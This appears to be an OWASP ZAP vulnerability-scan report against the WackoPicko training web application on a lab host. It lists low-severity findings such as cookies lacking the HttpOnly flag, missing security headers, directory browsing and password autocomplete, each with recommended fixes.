Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=3to91o8a8k8e5kr8ob87umq081; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/css/stylings.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/css/stylings.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. A directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/css/
Attack
Parent Directory

Solution

Disable directory browsing. If it is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in the directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/robots.txt

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/robots.txt

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=9jf9hitnjh91rgf4grp1ishmv5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID=v4s19tq25v45ffl2m1oln5chc1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID=h125dko1e4254cmu5p2lft1dm1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID=2qg2mi763dgvu7qfphcj8uvck3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=id7o978shnrd5ddfjm1cbcjuc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/guestbook.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/guestbook.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=qbf5uslrv6qehbdn22vhvul8d4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Password Autocomplete in browser

Description

The AUTOCOMPLETE attribute is not disabled on the HTML FORM/INPUT element containing a password-type input. Passwords may be stored in the browser and retrieved.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off the AUTOCOMPLETE attribute on the form, or on the individual input elements containing the password, by setting AUTOCOMPLETE='OFF'.

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/users/login.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/users/login.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=kagmsnnuhuo38usierjgbje4g0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Password Autocomplete in browser

Description

The AUTOCOMPLETE attribute is not disabled on the HTML FORM/INPUT element containing a password-type input. Passwords may be stored in the browser and retrieved.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off the AUTOCOMPLETE attribute on the form, or on the individual input elements containing the password, by setting AUTOCOMPLETE='OFF'.

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/users/register.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/users/register.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID=9at9eje0in752f3jleuslrs446; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID=0lig0nccr40asgp8b92i9jtpu7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=1ibt4cfue8gtgvqa0ifasroht3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Password Autocomplete in browser

Description

The AUTOCOMPLETE attribute is not disabled on the HTML FORM/INPUT element containing a password-type input. Passwords may be stored in the browser and retrieved.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off the AUTOCOMPLETE attribute on the form, or on the individual input elements containing the password, by setting AUTOCOMPLETE='OFF'.

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID=jnmmg4lon9hqtdqcj7l5lob4j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/tos.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/tos.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/css/blueprint/screen.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/css/blueprint/screen.css

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/css/blueprint/print.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/css/blueprint/print.css

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/css/blueprint/ie.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/css/blueprint/ie.css

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID=j6asp50ige6pbhcgk103ketmp2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and, if the Content-Type is unknown, the X-Content-Type-Options header.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID=v6bmrhud1ra09797s5oqe9m9c2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID=v8lsnk91utdobfk2e5t7rogel6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID=fav8k33bdu53fk4cftmati0006; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID=tu8humhbikk81lun726fhhjke2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID=knqtmo4j06f6vceq7hejtf2ql7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID=mgkto7tjfho7sut283313s11v2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID=7on14b3snkhfl710qppi62phc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID=ub3n7og2p0vlmpp8ono431s1t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID=s76merjj1k1jecnqbf4upn1ai1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=8pa7926o446nbllam0js95i1g2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/house/our_house.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/waterfall/Waterfall.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/house/My_House.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/toga/togasfs.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/toga/togas.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/doggie/Dog.jpg.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=ftnqjm8ams3893eeisf0pqs3o3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=hmdvkmpt78s0g11idc9id3s8o2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

